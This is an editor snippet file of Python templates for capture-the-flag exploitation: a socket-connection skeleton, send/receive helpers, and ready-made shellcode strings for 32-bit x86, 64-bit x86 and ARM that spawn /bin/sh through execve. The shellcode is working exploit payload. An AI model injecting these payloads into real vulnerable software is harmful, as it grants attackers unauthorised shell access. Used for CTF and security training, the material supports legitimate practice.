#python snippets for ctf
snippet ctf
	#!/usr/bin/env python
	# -*- coding: utf-8 -*-
	from pwnpwnpwn import *

	host = "${1}"
	port = ${2}
	
	sock = make_conn(host,port)

snippet recv
	recvuntil(sock,"${1}")


snippet send
	sendline(sock,${1})
snippet sc32
	"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
snippet sc64
	"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
snippet scarm
	"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68"
